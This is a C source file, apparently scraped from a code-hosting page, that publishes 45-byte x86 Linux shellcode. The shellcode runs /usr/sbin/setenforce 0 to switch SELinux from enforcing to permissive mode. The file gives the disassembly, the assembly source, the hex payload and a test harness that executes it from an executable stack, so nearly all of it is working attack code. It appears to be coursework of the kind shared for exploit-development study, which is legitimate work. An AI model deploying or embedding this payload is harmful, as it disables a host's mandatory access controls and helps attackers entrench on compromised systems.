81 lines
No EOL
1.9 KiB
C
81 lines
No EOL
1.9 KiB
C
/*
|
|
# Title: x86 SELinux change between permissive and enforcing modes shellcode
|
|
# Date: 20-02-2017
|
|
# Author: lu0xheap
|
|
# Platform: Lin_x86
|
|
# Tested on: CentOS 6.8 (i686)
|
|
# Shellcode Size: 45 bytes
|
|
# ID: SLAE - 871
|
|
*/
|
|
|
|
/*
|
|
1. Description:
|
|
|
|
SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
|
|
gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
|
|
|
|
2. Disassembly of section .text:
|
|
|
|
08048060 <_start>:
|
|
8048060: 6a 0b push 0xb
|
|
8048062: 58 pop eax
|
|
8048063: 31 d2 xor edx,edx
|
|
8048065: 52 push edx
|
|
8048066: 6a 30 push 0x30
|
|
8048068: 89 e1 mov ecx,esp
|
|
804806a: 52 push edx
|
|
804806b: 68 6f 72 63 65 push 0x6563726f
|
|
8048070: 68 74 65 6e 66 push 0x666e6574
|
|
8048075: 68 6e 2f 73 65 push 0x65732f6e
|
|
804807a: 68 2f 73 62 69 push 0x6962732f
|
|
804807f: 68 2f 75 73 72 push 0x7273752f
|
|
8048084: 89 e3 mov ebx,esp
|
|
8048086: 52 push edx
|
|
8048087: 51 push ecx
|
|
8048088: 53 push ebx
|
|
8048089: 89 e1 mov ecx,esp
|
|
804808b: cd 80 int 0x80
|
|
|
|
3. Code
|
|
|
|
global _start
|
|
section .text
|
|
_start:
|
|
push 0xb
|
|
pop eax
|
|
xor edx, edx
|
|
push edx
|
|
push byte 0x30
|
|
mov ecx, esp
|
|
push edx
|
|
push 0x6563726f
|
|
push 0x666e6574
|
|
push 0x65732f6e
|
|
push 0x6962732f
|
|
push 0x7273752f
|
|
mov ebx, esp
|
|
push edx
|
|
push ecx
|
|
push ebx
|
|
mov ecx, esp
|
|
int 0x80
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x6a\x0b\x58\x31\xd2\x52\x6a"
|
|
"\x30"
|
|
"\x89\xe1\x52\x68\x6f\x72\x63\x65"
|
|
"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
|
|
"\x73\x65\x68\x2f\x73\x62\x69\x68"
|
|
"\x2f\x75\x73\x72\x89\xe3\x52\x51"
|
|
"\x53\x89\xe1\xcd\x80";
|
|
|
|
main()
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
int (*ret)() = (int(*)())code;
|
|
ret();
|
|
} |